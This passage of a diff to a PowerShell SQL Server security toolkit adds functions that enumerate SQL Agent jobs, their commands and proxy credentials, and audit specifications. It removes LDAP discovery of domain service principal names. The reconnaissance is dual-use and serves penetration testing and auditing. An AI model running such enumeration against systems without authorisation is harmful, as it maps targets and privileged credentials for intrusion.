MSSQLSRV04\SQLSERVER2014 : - SQL Server Agent service enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : - Attempting to list existing agent jobs as sa. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : - 4 agent jobs found. + VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2016 : - SQL Server Agent service has not been started. + VERBOSE: MSSQLSRV04\SQLSERVER2016 : - Attempting to list existing agent jobs as sa. + VERBOSE: MSSQLSRV04\SQLSERVER2016 : - 3 agent jobs found. + VERBOSE: 7 agents jobs were found in total. + VERBOSE: SQL Server Agent Job Search Complete. + + Instance JOB_NAME step_name subsystem command + -------- -------- --------- --------- ------- + MSSQLSRV04\SQLSERVER2014 syspolicy_purge_history Verify that automation is enabled. TSQL IF (msdb.dbo.fn_syspolicy_is_autom... + MSSQLSRV04\SQLSERVER2014 syspolicy_purge_history Purge history. TSQL EXEC msdb.dbo.sp_syspolicy_purge_h... + MSSQLSRV04\SQLSERVER2014 syspolicy_purge_history Erase Phantom System Health Records. PowerShell if ('$(ESCAPE_SQUOTE(INST))' -eq '... + MSSQLSRV04\SQLSERVER2014 test test1 CmdExec whoami + MSSQLSRV04\SQLSERVER2016 syspolicy_purge_history Verify that automation is enabled. TSQL IF (msdb.dbo.fn_syspolicy_is_autom... + MSSQLSRV04\SQLSERVER2016 syspolicy_purge_history Purge history. TSQL EXEC msdb.dbo.sp_syspolicy_purge_h... + MSSQLSRV04\SQLSERVER2016 syspolicy_purge_history Erase Phantom System Health Records. PowerShell if ('$(ESCAPE_SQUOTE(INST))' -eq '... #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'Domain user to authenticate with domain\user.')] + HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'Domain password to authenticate with domain\user.')] + HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, - HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] + HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] - [string]$DomainController, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Computer name to filter for.')] - [string]$ComputerName, + HelpMessage = 'Only return SQL Agent jobs for specific subsystems.')] + [ValidateSet("TSQL","PowerShell","CMDEXEC","PowerShell","ActiveScripting","ANALYSISCOMMAND","ANALYSISQUERY","Snapshot","Distribution","LogReader","Merge","QueueReader")] + [String]$SubSystem, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Domain account to filter for.')] - [string]$DomainAccount, + HelpMessage = 'Only return SQL Agent jobs that have a command that includes a specific keyword.')] + [String]$Keyword, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SPN service code.')] - [string]$SpnService, + HelpMessage = 'Only return SQL Agent jobs using a proxy credentials.')] + [Switch]$UsingProxyCredential, + + [Parameter(Mandatory = $false, + HelpMessage = 'Only return SQL Agent jobs using a specific proxy credential.')] + [String]$ProxyCredential, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -8384,657 +9868,871 @@ function Get-DomainSpn Begin { - if(-not $SuppressVerbose) + if(-not $SuppressVerbose){ + Write-Verbose -Message "SQL Server Agent Job Search Starting..." + } + + # Setup data table for output + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('DatabaseName') + $null = $TblResults.Columns.Add('Job_Id') + $null = $TblResults.Columns.Add('Job_Name') + $null = $TblResults.Columns.Add('Job_Description') + $null = $TblResults.Columns.Add('Job_Owner') + $null = $TblResults.Columns.Add('Proxy_Id') + $null = $TblResults.Columns.Add('Proxy_Credential') + $null = $TblResults.Columns.Add('Date_Created') + $null = $TblResults.Columns.Add('Last_Run_Date') + $null = $TblResults.Columns.Add('Enabled') + $null = $TblResults.Columns.Add('Server') + $null = $TblResults.Columns.Add('Step_Name') + $null = $TblResults.Columns.Add('SubSystem') + $null = $TblResults.Columns.Add('Command') + + # Setup SubSystem filter + if($SubSystem) { - Write-Verbose -Message 'Getting domain SPNs...' + $SubSystemFilter = " and steps.subsystem like '$SubSystem'" + } + else + { + $SubSustemFilter = '' + } + + # Setup Command Keyword filter + if($Keyword) + { + $KeywordFilter = " and steps.command like '%$Keyword%'" } + else + { + $KeywordFilter = '' + } - # Setup table to store results - $TableDomainSpn = New-Object -TypeName System.Data.DataTable - $null = $TableDomainSpn.Columns.Add('UserSid') - $null = $TableDomainSpn.Columns.Add('User') - $null = $TableDomainSpn.Columns.Add('UserCn') - $null = $TableDomainSpn.Columns.Add('Service') - $null = $TableDomainSpn.Columns.Add('ComputerName') - $null = $TableDomainSpn.Columns.Add('Spn') - $null = $TableDomainSpn.Columns.Add('LastLogon') - $null = $TableDomainSpn.Columns.Add('Description') - $TableDomainSpn.Clear() + # Setup filter to only return jobs with proxy cred + if($UsingProxyCredential) + { + $UsingProxyCredFilter = " and steps.proxy_id > 0" + } + else + { + $UsingProxyCredFilter = '' + } + + # Setup filter to only return jobs with specific proxy cred + if($ProxyCredential) + { + $ProxyCredFilter = " and proxies.name like '$ProxyCredential'" + } + else + { + $ProxyCredFilter = '' + } } Process { - - try + # Default connection to local default instance + if(-not $Instance) { - # Setup LDAP filter - $SpnFilter = '' + $Instance = $env:COMPUTERNAME + } - if($DomainAccount) + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut + } + + # Attempt connection + try + { + # Open connection + $Connection.Open() + if(-not $SuppressVerbose) { - $SpnFilter = "(objectcategory=person)(SamAccountName=$DomainAccount)" + Write-Verbose -Message "$Instance : Connection Success." } - if($ComputerName) + # Get some information about current context + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + $Sysadmin = $ServerInfo.IsSysadmin + + # Check if Agent Job service is running + $IsAgentServiceEnabled = Get-SQLQuery -Instance $Instance -Query "SELECT 1 FROM sysprocesses WHERE LEFT(program_name, 8) = 'SQLAgent'" -Username $Username -Password $Password -SuppressVerbose + if ($IsAgentServiceEnabled) { - $ComputerSearch = "$ComputerName`$" - $SpnFilter = "(objectcategory=computer)(SamAccountName=$ComputerSearch)" + if(-not $SuppressVerbose){ + Write-Verbose -Message "$Instance : - SQL Server Agent service enabled." + } + } + else + { + if(-not $SuppressVerbose){ + Write-Verbose -Message "$Instance : - SQL Server Agent service has not been started." + } } - # Get results - $SpnResults = Get-DomainObject -LdapFilter "(&(servicePrincipalName=$SpnService*)$SpnFilter)" -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential + # Get logins that have SQL Agent roles + # https://msdn.microsoft.com/en-us/library/ms188283.aspx + $AddJobPrivs = Get-SQLDatabaseRoleMember -Username $Username -Password $Password -Instance $Instance -DatabaseName msdb -SuppressVerbose| ForEach-Object { + if($_.RolePrincipalName -match "SQLAgentUserRole|SQLAgentReaderRole|SQLAgentOperatorRole") { + if ($_.PrincipalName -eq $CurrentLogin) { $_ } + } + } - # Parse results - $SpnResults | ForEach-Object -Process { - [string]$SidBytes = [byte[]]"$($_.Properties.objectsid)".split(' ') - [string]$SidString = $SidBytes -replace ' ', '' - $Spn = $_.properties.serviceprincipalname.split(',') + if($AgentJobPrivs -or ($Sysadmin -eq "Yes")) + { + if(-not $SuppressVerbose){ + Write-Verbose -Message "$Instance : - Attempting to list existing agent jobs as $CurrentLogin." + } - foreach ($item in $Spn) - { - # Parse SPNs - $SpnServer = $item.split('/')[1].split(':')[0].split(' ')[0] - $SpnService = $item.split('/')[0] - # Parse last logon - if ($_.properties.lastlogon) - { - $LastLogon = [datetime]::FromFileTime([string]$_.properties.lastlogon).ToString('g') - } - else - { - $LastLogon = '' - } + # Reference: https://msdn.microsoft.com/en-us/library/ms189817.aspx + $Query = "SELECT steps.database_name, + job.job_id as [JOB_ID], + job.name as [JOB_NAME], + job.description as [JOB_DESCRIPTION], + SUSER_SNAME(job.owner_sid) as [JOB_OWNER], + steps.proxy_id, + proxies.name as [proxy_account], + job.enabled, + steps.server, + job.date_created, + steps.last_run_date, + steps.step_name, + steps.subsystem, + steps.command + FROM [msdb].[dbo].[sysjobs] job + INNER JOIN [msdb].[dbo].[sysjobsteps] steps + ON job.job_id = steps.job_id + left join [msdb].[dbo].[sysproxies] proxies + on steps.proxy_id = proxies.proxy_id + WHERE 1=1 + $KeywordFilter + $SubSystemFilter + $ProxyCredFilter + $UsingProxyCredFilter" + + # Execute Query + $result = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + + # Check the results + if(!($result)) { + Write-Verbose -Message "$Instance : - Either no jobs exist or the current login ($CurrentLogin) doesn't have the privileges to view them." + return + } - # Add results to table - $null = $TableDomainSpn.Rows.Add( - [string]$SidString, - [string]$_.properties.samaccountname, - [string]$_.properties.cn, - [string]$SpnService, - [string]$SpnServer, - [string]$item, - $LastLogon, - [string]$_.properties.description - ) + # Get number of results + $AgentJobCount = $result.rows.count + if(-not $SuppressVerbose){ + Write-Verbose -Message "$Instance : - $AgentJobCount agent jobs found." + } + + + # Update data table + $result | + ForEach-Object{ + $null = $TblResults.Rows.Add($ComputerName, + $Instance, + $_.database_name, + $_.JOB_ID, + $_.JOB_NAME, + $_.JOB_DESCRIPTION, + $_.JOB_OWNER, + $_.proxy_id, + $_.proxy_account, + $_.date_created, + $_.last_run_date, + $_.enabled, + $_.server, + $_.step_name, + $_.subsystem, + $_.command) + } + } + else + { + if(-not $SuppressVerbose){ + Write-Verbose -Message "$Instance : - The current login ($CurrentLogin) does not have any agent privileges." } + return } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } catch { - "Error was $_" - $line = $_.InvocationInfo.ScriptLineNumber - "Error was in Line $line" - } + # Connection failed + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + } } End { - # Check for results - if ($TableDomainSpn.Rows.Count -gt 0) - { - $TableDomainSpnCount = $TableDomainSpn.Rows.Count - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$TableDomainSpnCount SPNs found on servers that matched search criteria." + if(-not $SuppressVerbose){ + Write-Verbose -Message "SQL Server Agent Job Search Complete." + } + + # Get total count of jobs + $TotalAgentCount = $TblResults.rows.Count + + # Get subsystem summary data + $SummarySubSystem = $TblResults | Group-Object SubSystem | Select Name, Count | Sort-Object Count -Descending + + # Get proxy summary data + $SummaryProxyAccount = $TblResults | Select-Object proxy_credential -Unique | Measure-Object | Select-Object Count -ExpandProperty Count + + # Get system summary data + $SummaryServer = $TblResults | Select-Object ComputerName -Unique | Measure-Object | Select-Object Count -ExpandProperty Count + + # Get instance summary data + $SummaryInstance = $TblResults | Select-Object Instance -Unique | Measure-Object | Select-Object Count -ExpandProperty Count + + if(-not $SuppressVerbose){ + Write-Verbose -Message "---------------------------------" + Write-Verbose -Message "Agent Job Summary" + Write-Verbose -Message "---------------------------------" + Write-Verbose -Message " $TotalAgentCount jobs found" + Write-Verbose -Message " $SummaryServer affected systems" + Write-Verbose -Message " $SummaryInstance affected SQL Server instances" + Write-Verbose -Message " $SummaryProxyAccount proxy credentials used" + + Write-Verbose -Message "---------------------------------" + Write-Verbose -Message "Agent Job Summary by SubSystem" + Write-Verbose -Message "---------------------------------" + $SummarySubSystem | + ForEach-Object { + $SubSystem_Name = $_.Name + $SubSystem_Count = $_.Count + Write-Verbose -Message " $SubSystem_Count $SubSystem_Name Jobs" } - Return $TableDomainSpn - } - else - { - Write-Verbose -Message '0 SPNs found.' + Write-Verbose -Message " $TotalAgentCount Total" + Write-Verbose -Message "---------------------------------" } + + # Return data + $TblResults } } - -# ------------------------------------------- -# Function: Get-DomainObject -# ------------------------------------------- -# Author: Will Schroeder -# Modifications: Scott Sutherland -function Get-DomainObject +# ---------------------------------- +# Get-SQLAuditDatabaseSpec +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLAuditDatabaseSpec { <# .SYNOPSIS - Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system - Note: This will use the default logon server by default. + Returns Audit database specifications from target SQL Servers. .PARAMETER Username - Domain account to authenticate to Active Directory. + SQL Server or domain account to authenticate with. .PARAMETER Password - Domain password to authenticate to Active Directory. + SQL Server or domain account password to authenticate with. .PARAMETER Credential - Domain credential to authenticate to Active Directory. - .PARAMETER DomainController - Domain controller to authenticated to. Requires username/password or credential. - .PARAMETER LdapFilter - LDAP filter. - .PARAMETER LdapPath - Ldap path. - .PARAMETER $Limit - Maximum number of Objects to pull from AD, limit is 1,000.". - .PARAMETER SearchScope - Scope of a search as either a base, one-level, or subtree search, default is subtree.. + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER AuditName + Audit name. + .PARAMETER AuditSpecification + Audit specification. + .PARAMETER AuditAction + Audit action name. .EXAMPLE - PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" + PS C:\> Get-SQLAuditDatabaseSpec -Verbose -Instance "SQLServer1" .EXAMPLE - PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" -DomainController 10.0.0.1 -Username Domain\User -Password Password123! - .Note - This was based on Will Schroeder's Get-ADObject function from https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 + PS C:\> Get-SQLInstanceLocal | Get-SQLAuditDatabaseSpec -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'Domain user to authenticate with domain\user.')] + HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'Domain password to authenticate with domain\user.')] + HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, - HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] + HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] - [string]$DomainController, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = 'LDAP Filter.')] - [string]$LdapFilter = '', + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Audit name.')] + [string]$AuditName, [Parameter(Mandatory = $false, - HelpMessage = 'LDAP path.')] - [string]$LdapPath, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Specification name.')] + [string]$AuditSpecification, [Parameter(Mandatory = $false, - HelpMessage = 'Maximum number of Objects to pull from AD, limit is 1,000 .')] - [int]$Limit = 1000, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Audit action name.')] + [string]$AuditAction, + + [Parameter(Mandatory = $false, - HelpMessage = 'scope of a search as either a base, one-level, or subtree search, default is subtree.')] - [ValidateSet('Subtree','OneLevel','Base')] - [string]$SearchScope = 'Subtree' + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose ) + Begin { - # Create PS Credential object - if($Username -and $Password) + # Table for output + $TblAuditDatabaseSpec = New-Object -TypeName System.Data.DataTable + + # Setup audit name filter + if($AuditName) { - $secpass = ConvertTo-SecureString $Password -AsPlainText -Force - $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ($Username, $secpass) + $AuditNameFilter = " and a.name like '%$AuditName%'" } - - # Create Create the connection to LDAP - if ($DomainController) + else { - $objDomain = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://$DomainController", $Credential.UserName, $Credential.GetNetworkCredential().Password).distinguishedname - - # add ldap path - if($LdapPath) - { - $LdapPath = '/'+$LdapPath+','+$objDomain - $objDomainPath = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://$DomainController$LdapPath", $Credential.UserName, $Credential.GetNetworkCredential().Password - } - else - { - $objDomainPath = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://$DomainController", $Credential.UserName, $Credential.GetNetworkCredential().Password - } + $AuditNameFilter = '' + } - $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath + # Setup spec name filter + if($AuditSpecification) + { + $SpecNameFilter = " and s.name like '%$AuditSpecification%'" } else { - $objDomain = ([ADSI]'').distinguishedName - - # add ldap path - if($LdapPath) - { - $LdapPath = $LdapPath+','+$objDomain - $objDomainPath = [ADSI]"LDAP://$LdapPath" - } - else - { - $objDomainPath = [ADSI]'' - } - - $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath + $SpecNameFilter = '' } - # Setup LDAP filter - $objSearcher.PageSize = $Limit - $objSearcher.Filter = $LdapFilter - $objSearcher.SearchScope = 'Subtree' - } - - Process - { - try + # Setup action name filter + if($AuditAction) { - # Return object - $objSearcher.FindAll() | ForEach-Object -Process { - $_ - } + $ActionNameFilter = " and d.audit_action_name like '%$AuditAction%'" } - catch + else { - "Error was $_" - $line = $_.InvocationInfo.ScriptLineNumber - "Error was in Line $line" + $ActionNameFilter = '' } } - End + Process { - } -} + # Note: Tables queried by this function typically require sysadmin privileges. -# ------------------------------------------- -# Function: Get-SQLInstanceDomain -# ------------------------------------------- + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + + # Define Query + $Query = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + audit_id as [AuditId], + a.name as [AuditName], + s.name as [AuditSpecification], + d.audit_action_id as [AuditActionId], + d.audit_action_name as [AuditAction], + d.major_id, + OBJECT_NAME(d.major_id) as object, + s.is_state_enabled, + d.is_group, + s.create_date, + s.modify_date, + d.audited_result + FROM sys.server_audits AS a + JOIN sys.database_audit_specifications AS s + ON a.audit_guid = s.audit_guid + JOIN sys.database_audit_specification_details AS d + ON s.database_specification_id = d.database_specification_id WHERE 1=1 + $AuditNameFilter + $SpecNameFilter + $ActionNameFilter" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + + # Append results + $TblAuditDatabaseSpec = $TblAuditDatabaseSpec + $TblResults + } + + End + { + # Return data + $TblAuditDatabaseSpec + } +} + + +# ---------------------------------- +# Get-SQLAuditServerSpec +# ---------------------------------- # Author: Scott Sutherland -Function Get-SQLInstanceDomain +Function Get-SQLAuditServerSpec { <# .SYNOPSIS - Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. - The function will default to the current user's domain and logon server, but an alternative domain controller can be provided. - UDP scanning of management servers is optional. + Returns Audit server specifications from target SQL Servers. .PARAMETER Username - Domain user to authenticate with domain\user. + SQL Server or domain account to authenticate with. .PARAMETER Password - Domain password to authenticate with domain\user. + SQL Server or domain account password to authenticate with. .PARAMETER Credential - Credentials to use when connecting to a Domain Controller. - .PARAMETER DomainController - Domain controller for Domain and Site that you want to query against. Only used when username/password or credential is provided. - .PARAMETER ComputerName - Domain computer name to filter for. - .PARAMETER DomainAccount - Domain account to filter for. - .PARAMETER CheckMgmt - Performs UDP scan of servers with registered MSServerClusterMgmtAPI SPNs to help find additional SQL Server instances. - .PARAMETER UDPTimeOut - Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate. - .EXAMPLE - PS C:\> Get-SQLInstanceDomain -Verbose - VERBOSE: Grabbing SQL Server SPNs from domain... - VERBOSE: Getting domain SPNs... - VERBOSE: Parsing SQL Server instances from SPNs... - VERBOSE: 35 instances were found. - - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com - DomainAccountSid : 1500000521000123456712921821222049996811922123456 - DomainAccount : SQLServer1$ - DomainAccountCn : SQLServer1 - Service : MSSQLSvc - Spn : MSSQLSvc/SQLServer1.domain.com - LastLogon : 6/22/2016 9:00 AM - [TRUNCATED] + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER AuditName + Audit name. + .PARAMETER AuditSpecification + Audit specification. + .PARAMETER AuditAction + Audit action name. .EXAMPLE - PS C:\> Get-SQLInstanceDomain -Verbose -CheckMgmt - PS C:\> Get-SQLInstanceDomain -Verbose - VERBOSE: Grabbing SQL Server SPNs from domain... - VERBOSE: Getting domain SPNs... - VERBOSE: Parsing SQL Server instances from SPNs... - VERBOSE: 35 instances were found. - VERBOSE: Getting domain SPNs... - VERBOSE: 10 SPNs found on servers that matched search criteria. - VERBOSE: Performing a UDP scan of management servers to obtain managed SQL Server instances... - VERBOSE: - MServer1.domain.com - UDP Scan Start. - VERBOSE: - MServer1.domain.com - UDP Scan Complete. - - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com - DomainAccountSid : 1500000521000123456712921821222049996811922123456 - DomainAccount : SQLServer1$ - DomainAccountCn : SQLServer1 - Service : MSSQLSvc - Spn : MSSQLSvc/SQLServer1.domain.com - LastLogon : 6/22/2016 9:00 AM - [TRUNCATED] + PS C:\> Get-SQLAuditServerSpec -Verbose -Instance "SQLServer1" .EXAMPLE - PS C:\> Get-SQLInstanceDomain -DomainController 10.10.10.1 -Username domain\user -Password SecretPassword123! - VERBOSE: Grabbing SQL Server SPNs from domain... - VERBOSE: Getting domain SPNs... - VERBOSE: Parsing SQL Server instances from SPNs... - VERBOSE: 35 instances were found. - - ComputerName : SQLServer1.domain.com - Instance : SQLServer1.domain.com - DomainAccountSid : 1500000521000123456712921821222049996811922123456 - DomainAccount : SQLServer1$ - DomainAccountCn : SQLServer1 - Service : MSSQLSvc - Spn : MSSQLSvc/SQLServer1.domain.com - LastLogon : 6/22/2016 9:00 AM - [TRUNCATED] - - + PS C:\> Get-SQLInstanceLocal | Get-SQLAuditServerSpec -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'Domain user to authenticate with domain\user.')] + HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'Domain password to authenticate with domain\user.')] + HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, - HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] + HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, - HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] - [string]$DomainController, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Computer name to filter for.')] - [string]$ComputerName, + HelpMessage = 'Audit name.')] + [string]$AuditName, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Domain account to filter for.')] - [string]$DomainAccount, + HelpMessage = 'Specification name.')] + [string]$AuditSpecification, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Performs UDP scan of servers managing SQL Server clusters.')] - [switch]$CheckMgmt, + HelpMessage = 'Audit action name.')] + [string]$AuditAction, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate.')] - [int]$UDPTimeOut = 3 + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose ) Begin { - # Table for SPN output - $TblSQLServerSpns = New-Object -TypeName System.Data.DataTable - $null = $TblSQLServerSpns.Columns.Add('ComputerName') - $null = $TblSQLServerSpns.Columns.Add('Instance') - $null = $TblSQLServerSpns.Columns.Add('DomainAccountSid') - $null = $TblSQLServerSpns.Columns.Add('DomainAccount') - $null = $TblSQLServerSpns.Columns.Add('DomainAccountCn') - $null = $TblSQLServerSpns.Columns.Add('Service') - $null = $TblSQLServerSpns.Columns.Add('Spn') - $null = $TblSQLServerSpns.Columns.Add('LastLogon') - $null = $TblSQLServerSpns.Columns.Add('Description') + # Table for output + $TblAuditServerSpec = New-Object -TypeName System.Data.DataTable - # Table for UDP scan results of management servers + # Setup audit name filter + if($AuditName) + { + $AuditNameFilter = " and a.name like '%$AuditName%'" + } + else + { + $AuditNameFilter = '' + } + + # Setup spec name filter + if($AuditSpecification) + { + $SpecNameFilter = " and s.name like '%$AuditSpecification%'" + } + else + { + $SpecNameFilter = '' + } + + # Setup action name filter + if($AuditAction) + { + $ActionNameFilter = " and d.audit_action_name like '%$AuditAction%'" + } + else + { + $ActionNameFilter = '' + } } Process { - # Get list of SPNs for SQL Servers - Write-Verbose -Message 'Grabbing SPNs from the domain for SQL Servers (MSSQL*)...' - $TblSQLServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSSQL*' -SuppressVerbose | Where-Object -FilterScript { - $_.service -like 'MSSQL*' - } + # Note: Tables queried by this function typically require sysadmin privileges. - Write-Verbose -Message 'Parsing SQL Server instances from SPNs...' + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Add column containing sql server instance - $TblSQLServers | - ForEach-Object -Process { - # Parse SQL Server instance - $Spn = $_.Spn - $Instance = $Spn.split('/')[1].split(':')[1] + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } - # Check if the instance is a number and use the relevent delim - $Value = 0 - if([int32]::TryParse($Instance,[ref]$Value)) + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) { - $SpnServerInstance = $Spn -replace ':', ',' + Write-Verbose -Message "$Instance : Connection Success." } - else + } + else + { + if( -not $SuppressVerbose) { - $SpnServerInstance = $Spn -replace ':', '\' + Write-Verbose -Message "$Instance : Connection Failed." } - - $SpnServerInstance = $SpnServerInstance -replace 'MSSQLSvc/', '' - - # Add SQL Server spn to table - $null = $TblSQLServerSpns.Rows.Add( - [string]$_.ComputerName, - [string]$SpnServerInstance, - $_.UserSid, - [string]$_.User, - [string]$_.Usercn, - [string]$_.Service, - [string]$_.Spn, - $_.LastLogon, - [string]$_.Description) + return } - # Enumerate SQL Server instances from management servers - if($CheckMgmt) - { - Write-Verbose -Message 'Grabbing SPNs from the domain for Servers managing SQL Server clusters (MSServerClusterMgmtAPI)...' - $TblMgmtServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSServerClusterMgmtAPI' -SuppressVerbose | - Where-Object -FilterScript { - $_.ComputerName -like '*.*' - } | - Select-Object -Property ComputerName -Unique | - Sort-Object -Property ComputerName + # Define Query + $Query = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + audit_id as [AuditId], + a.name as [AuditName], + s.name as [AuditSpecification], + d.audit_action_name as [AuditAction], + s.is_state_enabled, + d.is_group, + d.audit_action_id as [AuditActionId], + s.create_date, + s.modify_date + FROM sys.server_audits AS a + JOIN sys.server_audit_specifications AS s + ON a.audit_guid = s.audit_guid + JOIN sys.server_audit_specification_details AS d + ON s.server_specification_id = d.server_specification_id WHERE 1=1 + $AuditNameFilter + $SpecNameFilter + $ActionNameFilter" - Write-Verbose -Message 'Performing a UDP scan of management servers to obtain managed SQL Server instances...' - $TblMgmtSQLServers = $TblMgmtServers | - Select-Object -Property ComputerName -Unique | - Get-SQLInstanceScanUDP -UDPTimeOut $UDPTimeOut - } + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + + # Append results + $TblAuditServerSpec = $TblAuditServerSpec + $TblResults } End { # Return data - if($CheckMgmt) - { - Write-Verbose -Message 'Parsing SQL Server instances from the UDP scan...' - $Tbl1 = 